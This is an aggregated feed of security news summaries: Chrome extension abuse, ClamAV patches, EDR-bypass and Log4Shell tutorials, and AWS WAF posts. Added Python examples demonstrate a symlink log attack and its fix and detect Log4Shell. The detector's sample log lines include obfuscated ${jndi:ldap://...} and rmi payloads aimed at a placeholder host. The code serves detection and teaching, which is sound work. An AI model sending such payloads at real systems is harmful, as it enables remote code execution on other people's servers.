Let's make one thing clear first: I'm not singling out Google's handling of problematic and malicious browser extensions because it is worse than Microsoft's for example. No, Microsoft is probably even worse but I never bothered finding out. That's because Microsoft Edge doesn't matter, its market share is too small. Google Chrome on the other hand is used by around 90% of the users world-wide, and one would expect Google to take their responsibility to protect its users very seriously, right? After all, browser extensions are one selling point of Google Chrome, so certainly Google would make sure they are safe? Unfortunately, my experience reporting numerous malicious or otherwise problematic browser extensions speaks otherwise. Google appears to take the “least effort required”...
https://palant.info/2025/01/13/chrome-web-store-is-a-mess/

BIScience: Collecting browsing history under false pretenses
This is a guest post by a researcher who wants to remain anonymous. You can contact the author via email. Recently, John Tuckner of Secure Annex and Wladimir Palant published great research about how BIScience and its various brands collect user data. This inspired us to publish part of our ongoing research to help the extension ecosystem be safer from bad actors. This post details what BIScience does with the collected data and how their public disclosures are inconsistent with actual practices, based on evidence compiled over several years. [Screenshot: claims on the BIScience website] Contents: Who is BIScience?; BIScience collects data from millions of users; BIScience buys data from partner third-party extensions; BIScience receives raw...
https://palant.info/2025/01/13/biscience-collecting-browsing-history-under-false-pretenses/

ClamAV 1.4 as Next Long-Term Stable (LTS)
We are excited to announce that ClamAV 1.4 is now designated as our latest Long-Term Stable (LTS) release. Previously, we planned to announce 1.5 as the next LTS version at the end of 2024. However, unforeseen challenges have delayed the 1.5 release, leading us to choose version 1.4 for long-term support. We apologize for any inconvenience that our delay in the announcement may have caused. The version support dates for ClamAV 1.4 are amended as follows. Key dates: initial 1.4 release date: August 15, 2024; patch versions continue until: August 15, 2027; DB downloads allowed until: August 15, 2028. For specific details, please read the ClamAV EOL Policy. Looking ahead, the beta version of ClamAV 1.5 will soon be available for community review. This version will...
https://blog.clamav.net/2025/01/clamav-14-as-next-long-term-stable-lts.html

ClamAV 1.4.1, 1.3.2, 1.0.7, and 0.103.12 security patch versions published
Today, we are publishing the 1.4.1, 1.3.2, 1.0.7, and 0.103.12 security patch versions. The release files for the patch versions are available for download on the ClamAV downloads page, on the GitHub Release page, and (with the exception of 0.103.12) through Docker Hub. The images on Docker Hub may not be immediately available on release day. Continue reading to learn what changed in each version. 1.4.1: ClamAV 1.4.1 is a critical patch release with the following fixes: CVE-2024-20506: Changed the logging module to disable following symlinks on Linux and Unix systems so as to prevent an attacker with existing access to the 'clamd' or 'freshclam' services from using a symlink to corrupt system files. This issue affects all currently supported versions. It will be fixed in 1.4.1, 1.3.2, 1.0.7 and 0.103.12. Thank...
https://blog.clamav.net/2024/09/clamav-141-132-107-and-010312-security.html
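The bug class behind CVE-2024-20506, shown as an added example in Python (this is not ClamAV's code, and the page does not show the actual patch): a daemon that opens its log file with a plain open() follows a symlink that a lower-privileged user planted at the log path, so whatever the link points to receives the log text. Opening with O_NOFOLLOW refuses a symlink as the final path component. The temporary directory, the stand-in "system-file" and the "clamd.log" name are constructed for the demonstration; it needs a POSIX system where the user may create symlinks.

```python
import errno
import os
import tempfile


def append_following(log_path: str, line: str) -> None:
    # Vulnerable pattern: a plain open() resolves a symlink at log_path, so the
    # link target (not the intended log file) receives the log text.
    with open(log_path, "a") as f:
        f.write(line)


def append_nofollow(log_path: str, line: str) -> None:
    # Hardened pattern: O_NOFOLLOW makes open() fail if the final path
    # component is a symlink (ELOOP on Linux/macOS, EMLINK on some BSDs).
    flags = os.O_WRONLY | os.O_APPEND | os.O_CREAT | os.O_NOFOLLOW
    fd = os.open(log_path, flags, 0o600)
    try:
        os.write(fd, line.encode())
    finally:
        os.close(fd)


def demo() -> dict:
    """Plant a symlink where the daemon logs, then try both open styles.
    Everything below lives in a throwaway directory (constructed for the demo)."""
    with tempfile.TemporaryDirectory() as d:
        target = os.path.join(d, "system-file")      # stands in for a file in /etc
        with open(target, "w") as f:
            f.write("original contents\n")
        log = os.path.join(d, "clamd.log")           # assumed log path
        os.symlink(target, log)                      # attacker-planted symlink

        append_following(log, "log entry written by daemon\n")
        with open(target) as f:
            corrupted = "log entry written by daemon" in f.read()

        try:
            append_nofollow(log, "second entry\n")
            refused = False
        except OSError as e:
            refused = e.errno in (errno.ELOOP, errno.EMLINK)

        return {"corrupted_via_symlink": corrupted, "nofollow_refused": refused}


if __name__ == "__main__":
    print(demo())
```

O_NOFOLLOW only protects the last path component: a symlinked parent directory still redirects the write, and a log directory writable by the service account is the root cause. Create the log file ahead of time as root with restrictive ownership, or log into a directory the daemon's user cannot rename or link into.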

CVE-2024-38063 - Remotely Exploiting The Kernel Via IPv6
Performing a root cause analysis and building a proof-of-concept for CVE-2024-38063, a CVSS 9.8 vulnerability in the Windows kernel IPv6 parser
https://malwaretech.com/2024/08/exploiting-CVE-2024-38063.html

Bypassing EDRs With EDR-Preloading
Evading user mode EDR hooks by hijacking the AppVerifier layer
https://malwaretech.com/2024/02/bypassing-edrs-with-edr-preload.html

Silly EDR Bypasses and Where To Find Them
Abusing exception handlers to hook and bypass user mode EDR hooks.
https://malwaretech.com/2023/12/silly-edr-bypasses-and-where-to-find-them.html

An Introduction to Bypassing User Mode EDR Hooks
Understanding the basics of user mode EDR hooking, common bypass techniques, and their limitations.
https://malwaretech.com/2023/12/an-introduction-to-bypassing-user-mode-edr-hooks.html

It Might Be Time to Rethink Phishing Awareness
Phishing awareness can be a powerful security tool, or a complete disaster. It all hinges on how you implement it.
https://malwaretech.com/2023/09/it-might-be-time-to-rethink-phishing-awareness.html

A Realistic Look at Implications of ChatGPT for Cybercrime
Analyzing ChatGPT's capabilities and various claims about how it will revolutionize cybercrime.
https://malwaretech.com/2023/02/a-realistic-look-at-chatgpt-cybercrime.html

CVE-2022-3602 and CVE-2022-3786: OpenSSL 3.0.7 patches Critical Vulnerability
On Tuesday, November 1 2022, between 13:00 and 17:00 UTC, the OpenSSL project announced the release of a new version of OpenSSL (version 3.0.7) that will patch a critical vulnerability in OpenSSL version 3.0 and above. Only OpenSSL versions between 3.0 and 3.0.6 are affected at the time of writing. At this moment the details of this [...]
https://www.hackingtutorials.org/general-tutorials/openssl-3-0-7-patches-critical-vulnerability/
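A version check for this advisory, as an added example that is not from the Hacking Tutorials post: it parses the `openssl version` banner (both the binary's version and the linked library's, which can differ) and flags 3.0.0 through 3.0.6, the range the summary above gives. Two caveats a practitioner needs: when the advisory was actually released, OpenSSL rated both CVE-2022-3602 and CVE-2022-3786 High rather than Critical; and distribution packages often backport the fix without changing the upstream version string, so a flagged banner means "check the package changelog", not "vulnerable". The sample banners are constructed.

```python
import re
import subprocess

# Range from the advisory summary above: 3.0.0 .. 3.0.6 affected, 3.0.7 fixed.
AFFECTED_SERIES = (3, 0)
FIRST_FIXED_PATCH = 7

# Matches "OpenSSL 3.0.5 5 Jul 2022" and 1.1.1-era "OpenSSL 1.1.1q"; the letter
# suffix is captured so it does not break parsing, but is not used.
_BANNER = re.compile(r"OpenSSL\s+(\d+)\.(\d+)\.(\d+)([a-z]*)", re.IGNORECASE)


def parse_banners(banner: str) -> list[tuple[int, int, int]]:
    """Return every (major, minor, patch) in an `openssl version` banner.
    A banner such as 'OpenSSL 3.0.7 ... (Library: OpenSSL 3.0.6 ...)' yields
    two entries: the CLI binary and the shared library it actually loaded."""
    found = [(int(a), int(b), int(c)) for a, b, c, _ in _BANNER.findall(banner)]
    if not found:
        raise ValueError(f"not an OpenSSL version banner: {banner!r}")
    return found


def is_affected(banner: str) -> bool:
    """True if any version in the banner falls in the affected 3.0.x range."""
    return any(
        (major, minor) == AFFECTED_SERIES and patch < FIRST_FIXED_PATCH
        for major, minor, patch in parse_banners(banner)
    )


def installed_banner() -> str:
    # Live check; assumes an `openssl` binary on PATH.
    out = subprocess.run(["openssl", "version"], capture_output=True, text=True, check=True)
    return out.stdout


if __name__ == "__main__":
    banner = installed_banner()
    print(banner.strip(), "->", "AFFECTED (verify backports)" if is_affected(banner) else "not in range")
```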

Student Loan Breach Exposes 2.5M Records
2.5 million people were affected, in a breach that could spell more trouble down the line.
https://threatpost.com/student-loan-breach-exposes-2-5m-records/180492/

Watering Hole Attacks Push ScanBox Keylogger
Researchers uncover a watering hole attack likely carried out by APT TA423, which attempts to plant the ScanBox JavaScript-based reconnaissance tool.
https://threatpost.com/watering-hole-attacks-push-scanbox-keylogger/180490/

Tentacles of ‘0ktapus' Threat Group Victimize 130 Firms
Over 130 companies tangled in sprawling phishing campaign that spoofed a multi-factor authentication system.
https://threatpost.com/0ktapus-victimize-130-firms/180487/

Ransomware Attacks are on the Rise
LockBit is by far this summer's most prolific ransomware group, trailed by two offshoots of the Conti group.
https://threatpost.com/ransomware-attacks-are-on-the-rise/180481/

Cybercriminals Are Selling Access to Chinese Surveillance Cameras
Tens of thousands of cameras have failed to patch a critical, 11-month-old CVE, leaving thousands of organizations exposed.
https://threatpost.com/cybercriminals-are-selling-access-to-chinese-surveillance-cameras/180478/

Twitter Whistleblower Complaint: The TL;DR Version
Twitter is blasted for security and privacy lapses by the company's former head of security who alleges the social media giant's actions amount to a national security risk.
https://threatpost.com/twitter-whistleblower-tldr-version/180472/

Firewall Bug Under Active Attack Triggers CISA Warning
CISA is warning that Palo Alto Networks' PAN-OS is under active attack and needs to be patched ASAP.
https://threatpost.com/firewall-bug-under-active-attack-cisa-warning/180467/

Fake Reservation Links Prey on Weary Travelers
Fake travel reservations are exacting more pain from the travel weary, already dealing with the misery of canceled flights and overbooked hotels.
https://threatpost.com/reservation-links-prey-on-travelers/180462/

iPhone Users Urged to Update to Patch 2 Zero-Days
Separate fixes to macOS and iOS patch respective flaws in the kernel and WebKit that can allow threat actors to take over devices and are under attack.
https://threatpost.com/iphone-users-urged-to-update-to-patch-2-zero-days-under-attack/180448/

Google Patches Chrome's Fifth Zero-Day of the Year
An insufficient input validation flaw, one of 11 patched in an update this week, could allow for arbitrary code execution and is under active attack.
https://threatpost.com/google-patches-chromes-fifth-zero-day-of-the-year/180432/

Installing Rogue-jndi on Kali Linux
Following the previous tutorial, in which we looked at the Log4j vulnerability in VMware vSphere, I got some questions about how to set up a malicious LDAP server on Linux. The attacker-controlled LDAP server is required to provide the malicious Java class (with a reverse shell, for example) in response to the forged [...]
https://www.hackingtutorials.org/general-tutorials/installing-rogue-jndi-on-kali-linux/

Log4Shell VMware vCenter Server (CVE-2021-44228)
Log4Shell is a critical vulnerability with the highest possible CVSSv3 score of 10.0 that affects thousands of products running Apache Log4j and leaves millions of targets potentially vulnerable. CVE-2021-44228 affects Log4j versions 2.0-beta9 to 2.14.1. Log4j is an incredibly popular logging library used in many different products and various Apache frameworks like Struts2, Kafka, and [...]
https://www.hackingtutorials.org/exploit-tutorials/log4shell-vmware-vcenter-server-cve-2021-44228/
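Detection logic for the CVE-2021-44228 lookup pattern, as an added example that is not from the Hacking Tutorials post: the classic payload is a ${jndi:ldap://...} lookup in any field the application logs, but attackers hide it behind Log4j's own nested lookups (${lower:j}, ${upper:n}, and the ${name:-default} syntax, including the bare ${::-j}). The normaliser below collapses those tricks before matching, which is why a plain grep for "jndi" misses much of what this finds. The log lines are constructed and use RFC 5737 documentation addresses.

```python
import re

# Innermost ${...} lookup: its body contains no further '${' or '}'.
_INNER = re.compile(r"\$\{([^${}]*)\}")
# After normalisation: ${jndi:<scheme>:...} in any letter case.
_JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)\s*:", re.IGNORECASE)


def _resolve(m: re.Match) -> str:
    body = m.group(1)
    if ":-" in body:                     # ${env:NOPE:-j} or ${::-j}: default wins
        return body.split(":-", 1)[1]
    kind, sep, arg = body.partition(":")
    if sep and kind.lower() == "lower":  # ${lower:J} -> j
        return arg.lower()
    if sep and kind.lower() == "upper":  # ${upper:n} -> N
        return arg.upper()
    return m.group(0)                    # unknown lookup (e.g. jndi): keep as-is


def normalize(text: str) -> str:
    """Collapse nested/obfuscating Log4j lookups until nothing more resolves.
    The iteration is bounded so a hostile input cannot make this spin."""
    for _ in range(50):
        new = _INNER.sub(_resolve, text)
        if new == text:
            return new
        text = new
    return text


def find_jndi(line: str):
    """Return the JNDI scheme ('ldap', 'rmi', 'dns', ...) if the line carries a
    lookup after normalisation, else None."""
    m = _JNDI.search(normalize(line))
    return m.group(1).lower() if m else None


def scan(lines):
    """(line index, scheme) for every line that contains a JNDI lookup."""
    hits = []
    for i, line in enumerate(lines):
        scheme = find_jndi(line)
        if scheme:
            hits.append((i, scheme))
    return hits


# Constructed access-log lines: one clean, four obfuscation styles, one benign lookup.
SAMPLE_LOG = [
    '203.0.113.5 - - "GET / HTTP/1.1" 200 "-" "Mozilla/5.0"',
    '203.0.113.5 - - "GET / HTTP/1.1" 200 "-" "${jndi:ldap://203.0.113.5:1389/a}"',
    '203.0.113.5 - - "GET /?x=${${lower:j}ndi:${lower:L}dap://203.0.113.5/b} HTTP/1.1" 404',
    '203.0.113.5 - - "GET / HTTP/1.1" 200 "-" "${${::-j}${::-n}${::-d}${::-i}:rmi://203.0.113.5/c}"',
    '203.0.113.5 - - "GET / HTTP/1.1" 200 "-" "${${env:NOPE:-j}${upper:n}di:${lower:DNS}://203.0.113.5/d}"',
    '198.51.100.9 - - "GET /?home=${env:HOME:-/root} HTTP/1.1" 200',
]

if __name__ == "__main__":
    for idx, scheme in scan(SAMPLE_LOG):
        print(f"line {idx}: jndi scheme={scheme}")
```

This is a triage aid, not a fix: it covers the lower/upper/default-value tricks but not every Log4j lookup type, nor payloads that arrive URL- or base64-encoded or split across several logged fields. Decode the request first, and treat the upgrade to a fixed Log4j as the actual remediation.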

How to customize behavior of AWS Managed Rules for AWS WAF
AWS Managed Rules for AWS WAF provides a group of rules created by AWS that can be used to help protect you against common application vulnerabilities and other unwanted access to your systems without having to write your own rules. The AWS Threat Research Team updates AWS Managed Rules to respond to an ever-changing threat landscape in order […]
https://aws.amazon.com/blogs/security/how-to-customize-behavior-of-aws-managed-rules-for-aws-waf/

The Great Leak: Microsoft Exchange AutoDiscover Design Flaw
Recently a “design flaw” in Microsoft Exchange's Autodiscover protocol was discovered by researchers that allowed access to 372,072 Windows domain credentials and 96,671 unique sets of credentials from applications such as Microsoft Outlook and third-party email clients. According to Amit Serper, the person who discovered the flaw, the source of the leak is [...]
https://www.hackingtutorials.org/pentesting-exchange/the-great-leak-microsoft-exchange-autodiscover-design-flaw/

The three most important AWS WAF rate-based rules
May 5, 2025: This post has been updated to reflect that the lowest allowable rate limit setting in AWS WAF rate-based rules has changed from 100 requests to 10. In this post, we explain what the three most important AWS WAF rate-based rules are for proactively protecting your web applications against common HTTP flood events, […]
https://aws.amazon.com/blogs/security/three-most-important-aws-waf-rate-based-rules/
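A model of how a rate-based rule decides, as an added example (it is not from the AWS post and not AWS WAF's implementation): each rule keys request counts by source IP over a sliding evaluation window, optionally scoped to a path prefix, and blocks once the count exceeds the limit. The minimum limit of 10 comes from the update note above; the 5-minute window, the "blanket" and "login" rule names and the thresholds are assumptions, and the requests are constructed.

```python
from collections import defaultdict, deque

MIN_RATE_LIMIT = 10       # lowest allowable limit per the May 2025 note above
WINDOW_SECONDS = 300      # assumption: the classic 5-minute evaluation window


class RateBasedRule:
    """Per-IP sliding-window counter. Blocks while an IP's request count inside
    the window exceeds the limit; the block lifts as old requests age out."""

    def __init__(self, name, limit, window=WINDOW_SECONDS, path_prefix=None):
        if limit < MIN_RATE_LIMIT:
            raise ValueError(f"{name}: limit {limit} is below the minimum {MIN_RATE_LIMIT}")
        self.name = name
        self.limit = limit
        self.window = window
        self.path_prefix = path_prefix          # scope-down statement, or None for all traffic
        self._hits = defaultdict(deque)         # ip -> timestamps inside the window

    def evaluate(self, ts, ip, path):
        if self.path_prefix and not path.startswith(self.path_prefix):
            return "ALLOW"                      # out of scope: not even counted
        q = self._hits[ip]
        q.append(ts)
        while q and ts - q[0] >= self.window:   # slide the window forward
            q.popleft()
        return "BLOCK" if len(q) > self.limit else "ALLOW"


def run_rules(rules, requests):
    """Every rule counts every in-scope request; the first rule that blocks
    names the verdict. Returns one decision string per request."""
    decisions = []
    for ts, ip, path in requests:
        blocking = [r.name for r in rules if r.evaluate(ts, ip, path) == "BLOCK"]
        decisions.append(f"BLOCK:{blocking[0]}" if blocking else "ALLOW")
    return decisions


def demo():
    # A coarse blanket rule plus a tight rule on the login path (assumed numbers).
    rules = [
        RateBasedRule("blanket", 1000),
        RateBasedRule("login", 10, path_prefix="/login"),
    ]
    # Constructed traffic: 12 login attempts in two minutes from one address,
    # then one more after the window has slid past them, then a non-login hit.
    attempts = [(t, "198.51.100.7", "/login") for t in range(0, 120, 10)]
    attempts.append((500, "198.51.100.7", "/login"))
    attempts.append((500, "198.51.100.7", "/"))
    return run_rules(rules, attempts)


if __name__ == "__main__":
    for i, d in enumerate(demo()):
        print(i, d)
```

Three things the model makes visible that a rule author has to get right: the limit is "more than N", so the tenth login attempt still passes and the eleventh is blocked; a scope-down statement decides which requests are counted at all, not just which are blocked; and the block is temporary by design. The real service evaluates counts in batches rather than per request and offers more aggregation keys than the source IP, so treat exact timing here as illustrative.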

Automatically update AWS WAF IP sets with AWS IP ranges
Note: This blog post describes how to automatically update AWS WAF IP sets with the most recent AWS IP ranges for AWS services. This related blog post describes how to perform a similar update for Amazon CloudFront IP ranges that are used in VPC Security Groups. You can use AWS Managed Rules for AWS WAF […]
https://aws.amazon.com/blogs/security/automatically-update-aws-waf-ip-sets-with-aws-ip-ranges/

AWS Shield threat landscape review: 2020 year-in-review
AWS Shield is a managed service that protects applications that are running on Amazon Web Services (AWS) against external threats, such as bots and distributed denial of service (DDoS) attacks. Shield detects network and web application-layer volumetric events that may indicate a DDoS attack, web content scraping, or other unauthorized non-human traffic that is interacting […]
https://aws.amazon.com/blogs/security/aws-shield-threat-landscape-review-2020-year-in-review/

How to protect a self-managed DNS service against DDoS attacks using AWS Global Accelerator and AWS Shield Advanced
In this blog post, I show you how to improve the distributed denial of service (DDoS) resilience of your self-managed Domain Name System (DNS) service by using AWS Global Accelerator and AWS Shield Advanced. You can use those services to incorporate some of the techniques used by Amazon Route 53 to protect against DDoS attacks. […]
https://aws.amazon.com/blogs/security/how-to-protect-a-self-managed-dns-service-against-ddos-attacks-using-aws-global-accelerator-and-aws-shield-advanced/

Set up centralized monitoring for DDoS events and auto-remediate noncompliant resources
When you build applications on Amazon Web Services (AWS), it's a common security practice to isolate production resources from non-production resources by logically grouping them into functional units or organizational units. There are many benefits to this approach, such as making it easier to implement the principle of least privilege, or reducing the scope of […]
https://aws.amazon.com/blogs/security/set-up-centralized-monitoring-for-ddos-events-and-auto-remediate-noncompliant-resources/

Deploying defense in depth using AWS Managed Rules for AWS WAF (part 2)
In this post, I show you how to use recent enhancements in AWS WAF to manage a multi-layer web application security enforcement policy. These enhancements will help you to maintain and deploy web application firewall configurations across deployment stages and across different types of applications. In part 1 of this post I describe the technologies […]
https://aws.amazon.com/blogs/security/deploying-defense-in-depth-using-aws-managed-rules-for-aws-waf-part-2/

Defense in depth using AWS Managed Rules for AWS WAF (part 1)
In this post, I discuss how you can use recent enhancements in AWS WAF to manage a multi-layer web application security enforcement policy. These enhancements will help you to maintain and deploy web application firewall configurations across deployment stages and across different types of applications. The post is in two parts. This first part describes […]
https://aws.amazon.com/blogs/security/defense-in-depth-using-aws-managed-rules-for-aws-waf-part-1/

Houston consulate one of worst offenders in Chinese espionage, say U.S. officials
Credits: Reuters. The United States ordered the consulate closed this week, leading China to retaliate on Friday by telling the United States to shut its consulate in the city of Chengdu, as relations between the world's two largest economies […]
http://blog.extremehacking.org/blog/2020/07/24/houston-consulate-one-of-worst-offenders-in-chinese-espionage-say-u-s-officials/

Shocked I am. Shocked to find that underground bank-card-trading forums are full of liars, cheats, small-time grifters
Credits: The Register. The denizens of online forums dedicated to trading in stolen credit cards have been shown to be wretched hives of scum and villainy. This not-so-surprising news comes this week via academics at Washington State University (WSU) in the US, […]
http://blog.extremehacking.org/blog/2020/07/24/shocked-i-am-shocked-to-find-that-underground-bank-card-trading-forums-are-full-of-liars-cheats-small-time-grifters/

AWS Shield Threat Landscape report is now available
AWS Shield is a managed threat protection service that safeguards applications running on AWS against exploitation of application vulnerabilities, bad bots, and Distributed Denial of Service (DDoS) attacks. The AWS Shield Threat Landscape Report (TLR) provides you with a summary of threats detected by AWS Shield. This report is curated by the AWS Threat Research […]
https://aws.amazon.com/blogs/security/aws-shield-threat-landscape-report-now-available/

Vint Cerf suggests GDPR could hurt coronavirus vaccine development
Credits: The Register. TCP/IP co-developer Vint Cerf, revered as a critical contributor to the foundations of the internet, has floated the notion that privacy legislation might hinder the development of a vaccination for the COVID-19 coronavirus. In an essay written for […]
http://blog.extremehacking.org/blog/2020/05/16/vint-cerf-suggests-gdpr-could-hurt-coronavirus-vaccine-development/

Brit defense contractor hacked, up to 100,000 past and present employees' details siphoned off – report
Credits: The Register. Britain's Ministry of Defence contractor Interserve has been hacked, reportedly leaking the details of up to 100,000 past and current employees, including payment information and details of their next of kin. The Daily Telegraph reports that up to […]
http://blog.extremehacking.org/blog/2020/05/16/brit-defense-contractor-hacked-up-to-100000-past-and-present-employees-details-siphoned-off-report/

US officially warns China is launching cyberattacks to steal coronavirus research
Credits: CNN. The US Department of Homeland Security and the FBI issued a “public service announcement” Wednesday warning that China is likely launching cyberattacks to steal coronavirus data related to vaccines and treatments from US research institutions and pharmaceutical […]
http://blog.extremehacking.org/blog/2020/05/14/us-officially-warns-china-is-launching-cyberattacks-to-steal-coronavirus-research/

There's Norway you're going to believe this: World's largest sovereign wealth fund conned out of $10m in cyber-attack
Credits: The Register. The Norwegian Investment Fund has been swindled out of $10m (£8.2m) by fraudsters who pulled off what's been described as “an advance data breach.” Norfund – the world's largest sovereign wealth fund, created from saved North Sea […]
http://blog.extremehacking.org/blog/2020/05/14/theres-norway-youre-going-to-believe-this-worlds-largest-sovereign-wealth-fund-conned-out-of-10m-in-cyber-attack/

Stop tracking me, Google: Austrian citizen files GDPR legal complaint over Android Advertising ID
Credits: The Register. Privacy pressure group Noyb has filed a legal complaint against Google on behalf of an Austrian citizen, claiming the Android Advertising ID on every Android device is “personal data” as defined by the EU's GDPR and that […]
http://blog.extremehacking.org/blog/2020/05/14/stop-tracking-me-google-austrian-citizen-files-gdpr-legal-complaint-over-android-advertising-id/

Cyber-attacks hit hospital construction companies
Credits: BBC. Interserve, which helped build Birmingham's NHS Nightingale hospital, and Bam Construct, which delivered the Yorkshire and the Humber's, have reported the incidents to authorities. Earlier this month, the government warned healthcare groups involved in the response to […]
http://blog.extremehacking.org/blog/2020/05/13/cyber-attacks-hit-hospital-construction-companies/

Researchers spot thousands of Android apps leaking user data through misconfigured Firebase databases
Credits: The Register. Security researchers at Comparitech have reported that an estimated 24,000 Android apps are leaking user data because of misconfigured Firebase databases. Firebase is a popular backend service with SDKs for multiple platforms, including Android, iOS, web, C++ and Unity (for […]
http://blog.extremehacking.org/blog/2020/05/13/researchers-spot-thousands-of-android-apps-leaking-user-data-through-misconfigured-firebase-databases/

Papa don't breach: Contracts, personal info on Madonna, Lady Gaga, Elton John, others swiped in celeb law firm ‘hack'
Credits: The Register. Hackers are threatening to release 756GB of A-list celebs' contracts, recording deals, and other personal info allegedly stolen from a New York law firm. The miscreants have seemingly got their hands on confidential agreements, private correspondence, contact […]
http://blog.extremehacking.org/blog/2020/05/13/papa-dont-breach-contracts-personal-info-on-madonna-lady-gaga-elton-john-others-swiped-in-celeb-law-firm-hack/

CVE-2019-19781: Citrix ADC RCE vulnerability
A week before the 2019 holidays Citrix announced that an authentication bypass vulnerability was discovered in multiple Citrix products. The affected products are the Citrix Application Delivery Controller (formerly known as NetScaler ADC), Citrix Gateway (formerly known as NetScaler Gateway), and the Citrix SD-WAN WANOP appliance. Exploiting the vulnerability could allow an unauthenticated attacker [...]
https://www.hackingtutorials.org/exploit-tutorials/cve-2019-19781-citrix-adc-rce-vulnerability/

Vulnerability Scanning with OpenVAS 9 part 4: Custom scan configurations
For all scans so far, we've only used the default scan configurations such as host discovery, system discovery and Full & fast. But what if we don't want to run all NVTs on a given target (list) and only test for a few specific vulnerabilities? In this case we can create our own custom scan [...]
https://www.hackingtutorials.org/scanning-tutorials/openvas-9-part-4-custom-scan-configurations/

Vulnerability Scanning with OpenVAS 9 part 3: Scanning the Network
In the previous parts of the Vulnerability Scanning with OpenVAS 9 tutorials we have covered the installation process and how to run vulnerability scans using OpenVAS and the Greenbone Security Assistant (GSA) web application. In part 3 of Vulnerability Scanning with OpenVAS 9 we will have a look at how to run scans using different [...]
https://www.hackingtutorials.org/scanning-tutorials/vulnerability-scanning-with-openvas-9-scanning-the-network/

Vulnerability Scanning with OpenVAS 9 part 2: Vulnerability Scanning
In the previous tutorial, Vulnerability Scanning with OpenVAS 9.0 part 1, we went through the installation process of OpenVAS on Kali Linux and the installation of the virtual appliance. In this tutorial we will learn how to configure and run a vulnerability scan. For demonstration purposes we've also installed a virtual machine with Metasploitable 2 [...]
https://www.hackingtutorials.org/scanning-tutorials/vulnerability-scanning-openvas-9-0-part-2/

Vulnerability Scanning with OpenVAS 9 part 1: Installation & Setup
A couple of years ago we did a tutorial on Hacking Tutorials on how to install the popular vulnerability assessment tool OpenVAS on Kali Linux. We covered the installation process on Kali Linux and running a basic scan on the Metasploitable 2 virtual machine to identify vulnerabilities. In this tutorial I want to cover more details [...]
https://www.hackingtutorials.org/scanning-tutorials/vulnerability-scanning-openvas-9-pt-1/